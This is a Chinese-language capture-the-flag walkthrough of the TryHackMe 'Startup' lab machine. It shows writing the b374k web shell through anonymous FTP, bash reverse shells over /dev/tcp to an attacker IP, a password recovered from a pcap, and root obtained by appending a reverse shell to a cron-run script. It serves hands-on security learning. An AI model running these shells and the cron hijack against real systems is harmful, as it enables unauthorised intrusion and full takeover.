[Day15] THM Startup

• 网址 : https://tryhackme.com/room/startup
• IP : 10.10.37.216

扫描

• 老规矩 nmap 起手式
  • nmap -A 10.10.37.216
  • 
  • 有开
    • 21 FTP
      • nmap 说 Anonymous allow
    • 22 SSH
    • 80 网页
• 扫网页路径
  • python3 dirsearch.py -u http://10.10.37.216/ -e all
  • 可能有用的路径
    • http://10.10.37.216/files/
      • 里面有一段话，跟 meme
      • 

FTP

• ftp 10.10.37.216
  • 帐号 : Anonymous
  • 密码 : 空白
  • 
  • 发现路径就是网页服务器的files
• 尝试上传 b374k.php
  • 根目录(网页的 files)
    • 
    • 发现没有权限
  • ftp 目录
    • 
    • 有权限ㄌ!

Web Shell

• 访问 http://10.10.37.216/files/ftp/b374k.php
  • 使用预设密码
• 转用 Reverse Shell
  • 本地端准备 nc -vlk 7877
  • 在 Terminal 输入 bash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'
• 切换为交互式 shell
  • python -c 'import pty; pty.spawn("/bin/bash")'

系统内逛大街

• 根目录底下有一个 recipe.txt
  • Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.
• 问题
  • What is the secret spicy soup recipe?
    • love
• 根目录底下还有一个 incidents
  • 内部有 suspicious.pcapng
  • 透过 webshell 把资料载下来备用
• 观察 /home
  • 发现有一个 lennie 使用者

解析 pcap

• 观察第 45 个封包 follow TCP stream
  • 可以看到 webshell 的纪录
  • 
  • 其中输入了密码 c4ntg3t3n0ughsp1c3

尝试登入使用者

• 回到 reverse shell 输入 su lennie 并搭配上述密码
  • 
  • 登入成功!!
• 取得 User flag
  • 

提权

• 在使用者资料夹里找到 scripts 资料夹
  • 
  • 两个档案权限都是 root，但我们可以进行读取
  • planner.sh

    • #!/bin/bash
      echo $LIST > /home/lennie/scripts/startup_list.txt
      /etc/print.sh
      

  • 看起来会把环境变数 $LIST 给写到 startup_list.txt
  • 接着呼叫 /etc/print.sh
• 观察 /etc/print.sh 可以发现我们有 write 的权限
  • -rwx------ 1 lennie lennie 25 Nov 12 2020 /etc/print.sh
• 在 print.sh 下面加上一行 reverse shell
  • echo "bash -c 'bash -i >& /dev/tcp/10.14.7.198/8778 0>&1'" >> /etc/print.sh
  • 当然这边的 port 要跟目前的不同，然後本地开 nc -vlk 8778 来听
  • 然後连指令都还没执行，就莫名地拿到 root ㄌ ?__?
    • 

研究拿到 Root 的原因

• 理论上是因为某个 Cron job 的执行
• 使用 Pspy
  • 用上述同样方法载到靶机观察
  • 
  • 发现每分钟都会用 UID=0 执行一次 planner.sh
  • 所以应该是一个 root 的 cron job
• 进入root後
  • 输入 crontab -l
    • 
    • 就能看到这条 cron job 了